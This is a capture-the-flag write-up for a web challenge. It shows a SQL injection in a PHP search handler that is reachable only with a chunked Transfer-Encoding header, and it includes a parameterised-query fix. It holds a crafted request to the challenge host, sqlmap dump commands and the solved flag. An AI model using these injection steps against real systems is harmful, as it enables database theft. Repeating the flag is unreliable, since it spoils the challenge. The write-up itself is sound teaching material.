0xBOverchunked
Challenge Description
Are you able to retrieve the 6th character from the database?
Category: Web
Difficulty: Easy
Points: 20
Solution
In the code we can see that the following line in Cursor.php is vulnerable to SQL injection, because $id is concatenated directly into the query string:
$stmt = $pdo->query("SELECT id, gamename, gamedesc, image FROM posts WHERE id = '$id'");
This function is called from SearchHandler.php, but only when the request carries a Transfer-Encoding: chunked header:
if (isset($_SERVER["HTTP_TRANSFER_ENCODING"]) && $_SERVER["HTTP_TRANSFER_ENCODING"] == "chunked")
{
    $search = $_POST['search'];
    $result = unsafequery($pdo, $search);
    echo $result;
}
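To show why the concatenated query is the real problem, here is an added example (not the challenge's own code) that places the page's query pattern next to a parameterised PDO version and runs both against an in-memory SQLite database with constructed rows. The function name safequery and the sample data are assumptions for this example.

```php
<?php
// Added example, not the challenge's code: the page's string-built query
// beside a parameterised version, run offline against in-memory SQLite.

// Constructed sample data; column names follow the page's query.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
// Emulated prepares would let PDO splice values in client-side; turn them
// off so the SQLite driver binds the parameters itself.
$pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
$pdo->exec("CREATE TABLE posts (id INTEGER PRIMARY KEY, gamename TEXT, gamedesc TEXT, image TEXT)");
$pdo->exec("INSERT INTO posts VALUES (1, 'Game One', 'first description', 'one.png')");
$pdo->exec("INSERT INTO posts VALUES (2, 'Game Two', 'second description', 'two.png')");

// The pattern from Cursor.php: $id is concatenated straight into the SQL,
// so any quote in the input changes the grammar of the statement.
function unsafequery(PDO $pdo, string $id): array
{
    $stmt = $pdo->query("SELECT id, gamename, gamedesc, image FROM posts WHERE id = '$id'");
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened version (hypothetical name): the statement is compiled first and
// the value is bound afterwards, so the input can only ever be a value.
function safequery(PDO $pdo, string $id): array
{
    $stmt = $pdo->prepare("SELECT id, gamename, gamedesc, image FROM posts WHERE id = :id");
    $stmt->bindValue(':id', $id, PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed input that closes the quoted literal and appends a tautology:
// unsafequery hands the whole table back, safequery treats it as a string
// that matches no id.
$input = "1' OR '1'='1";
echo "unsafequery rows: " . count(unsafequery($pdo, $input)) . "\n";
echo "safequery rows:   " . count(safequery($pdo, $input)) . "\n";

// A legitimate lookup still works through the safe path.
echo "safequery id=1:   " . safequery($pdo, '1')[0]['gamename'] . "\n";
```

The Transfer-Encoding check in SearchHandler.php only gates which requests reach the query; it is not a control, so the fix belongs in the query itself.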
It is just a matter of adding the Transfer-Encoding: chunked header, and we can exploit the SQLi to obtain the flag.
POST /Controllers/Handlers/SearchHandler.php HTTP/1.1
Host: 83.136.254.13:49556
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 8
Origin: http://83.136.254.13:49556
Connection: close
Referer: http://83.136.254.13:49556/
Transfer-Encoding: chunked
search=1
We use sqlmap for this process, first to confirm the injection point and then to dump the gamedesc column of the posts table.
sqlmap -r req.txt -p search --level 5 --risk 3 --dbms=sqlite --ignore-code=500
sqlmap -r req.txt -p search --level 5 --risk 3 --dbms=sqlite --ignore-code=500 -T posts -C gamedesc --dump
HTB{tr4nsf3r_3Nc0d1Ng_4t_1ts_f1n3st}